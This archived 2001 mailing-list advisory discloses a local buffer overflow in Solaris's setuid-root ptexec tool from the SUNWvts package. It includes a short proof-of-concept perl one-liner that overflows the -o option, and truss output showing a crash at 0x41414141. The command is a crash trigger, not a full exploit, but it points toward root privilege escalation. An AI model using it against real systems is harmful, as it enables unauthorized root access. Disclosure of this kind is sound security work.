Solaris /opt/SUNWvts/bin/ptexec Vulnerability

From: Pablo Sor (psorat_private)
Date: Thu Jun 21 2001 - 10:01:02 PDT

Next message: TurboLinux Security Team: "TLSA2001028 gnupg-1.0.6-1"

Previous message: Larry W. Cashdollar: "suid scotty (ntping) overflow (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Vulnerability in Solaris /opt/SUNWvts/bin/ptexec

Date Published: June 21, 2001

Advisory ID: N/A

Bugtraq ID: N/A

CVE CAN: Non currently assigned.

Title: Solaris /opt/SUNWvts/bin/ptexec Buffer Overflow Vulnerability

Class: Boundary Error Condition

Remotely Exploitable: No

Locally Exploitable: Yes

Vulnerability Description:

A problem with the ptexec command included in the SUNWvts package (not
included in the Solaris default instalation) installed setuid root by default, 
results in a buffer overflow and potentially the execution of arbitraty code.
Due to the insufficient handling of input by the -o option of ptexec, a 
buffer overflow at 400 characters makes it possible to overwrite memory space
of the running process.

Vulnerable Packages/Systems:

SunOS 5.8 SPARC (have not tested on other version)

Solution/Vendor Information/Workaround:

Sun Microsystems was notified on June 12, 2001. Patches are excepted shortly.

Credits:

This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelpat_private

Technical Description :

# uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

# > .sunvts_sec_gss
# /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
Segmentation Fault (core dumped)

# truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`

execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54)  argc = 3
stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780)     = 0
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
open("/usr/lib/librpcsvc.so.1", O_RDONLY)       = 3
fstat(3, 0xFFBEF518)                            = 0
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000

[.....]

sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0
sigaction(SIGSEGV, 0xFFBEE388, 0x00000000)      = 0
sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0
setcontext(0xFFBEE248)
    Incurred fault #6, FLTBOUNDS  %pc = 0xFF139FF0
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
    Received signal #11, SIGSEGV [default]
      siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
        *** process killed ***


-- 
Pablo Sor
psorat_private, psorat_private

Next message: TurboLinux Security Team: "TLSA2001028 gnupg-1.0.6-1"
Previous message: Larry W. Cashdollar: "suid scotty (ntping) overflow (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jun 21 2001 - 17:55:35 PDT